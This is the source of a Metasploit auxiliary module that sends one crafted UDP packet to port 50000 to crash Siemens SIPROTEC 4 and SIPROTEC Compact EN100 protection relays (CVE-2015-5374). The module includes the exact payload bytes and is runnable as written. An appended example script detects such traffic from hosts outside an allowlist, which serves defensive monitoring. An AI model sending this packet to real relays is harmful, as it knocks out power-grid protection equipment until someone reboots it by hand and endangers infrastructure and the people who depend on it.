GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/scada/siemens_siprotec4.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      'Name' => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
      'Description' => %q{
        This module sends a specially crafted packet to port 50000/UDP
        causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
        A manual reboot is required to return the device to service.
        CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
      },
      'Author' => [ 'M. Can Kurnaz' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 1 $',
      'References' =>
        [
          [ 'CVE', '2015-5374' ],
          [ 'EDB', '44103' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01' ]
        ])
    # Default target port: the EN100 module's service on 50000/UDP.
    register_options([Opt::RPORT(50000),])
  end

  def run
    connect_udp
    pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
    print_status('Sending DoS packet...')
    # One datagram is sent; no response is read before the socket is closed.
    udp_sock.put(pckt)
    disconnect_udp
  end
end
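
A detection-side counterpart to the module's description, added here as an example and not part of the Metasploit source: it scans flow records for UDP traffic to port 50000 on protection relays coming from hosts outside an allowlist. The relay subnet, the allowed engineering station, the flow-log format and all function names are assumptions made for illustration.

```ruby
require 'ipaddr'

# Assumed inventory (constructed): relay subnet and the engineering stations
# permitted to reach the EN100 module on 50000/UDP.
EN100_PORT = 50_000
RELAYS = [IPAddr.new('192.0.2.0/28')].freeze
ALLOWED_SOURCES = [IPAddr.new('198.51.100.10')].freeze

# Constructed flow records: "timestamp src dst proto dport bytes"
SAMPLE_FLOWS = <<~LOG
  2024-05-01T10:00:01Z 198.51.100.10 192.0.2.5 udp 50000 64
  2024-05-01T10:00:07Z 203.0.113.77 192.0.2.5 udp 50000 18
  2024-05-01T10:00:09Z 203.0.113.77 192.0.2.9 tcp 102 120
  2024-05-01T10:00:12Z 203.0.113.77 198.51.100.20 udp 50000 18
  malformed line
LOG

Flow = Struct.new(:time, :src, :dst, :proto, :dport, :bytes)

# Parse one record; returns nil for malformed lines instead of raising.
def parse_flow(line)
  f = line.split
  return nil unless f.size == 6

  Flow.new(f[0], IPAddr.new(f[1]), IPAddr.new(f[2]), f[3].downcase,
           Integer(f[4]), Integer(f[5]))
rescue ArgumentError # also covers IPAddr::InvalidAddressError
  nil
end

def covers?(nets, ip)
  nets.any? { |net| net.include?(ip) }
end

# Flows to 50000/UDP on a relay whose source is not an allowed station.
def suspicious_en100_flows(text, relays: RELAYS, allowed: ALLOWED_SOURCES)
  text.each_line.filter_map do |line|
    flow = parse_flow(line)
    next unless flow && flow.proto == 'udp' && flow.dport == EN100_PORT
    next unless covers?(relays, flow.dst)

    flow unless covers?(allowed, flow.src)
  end
end

suspicious_en100_flows(SAMPLE_FLOWS).each do |f|
  puts "ALERT #{f.time} #{f.src} -> #{f.dst} udp/#{EN100_PORT} (#{f.bytes} bytes)"
end
```

Matching on destination, port and source rather than on payload bytes keeps the check useful for any unexpected sender, not only one fixed packet.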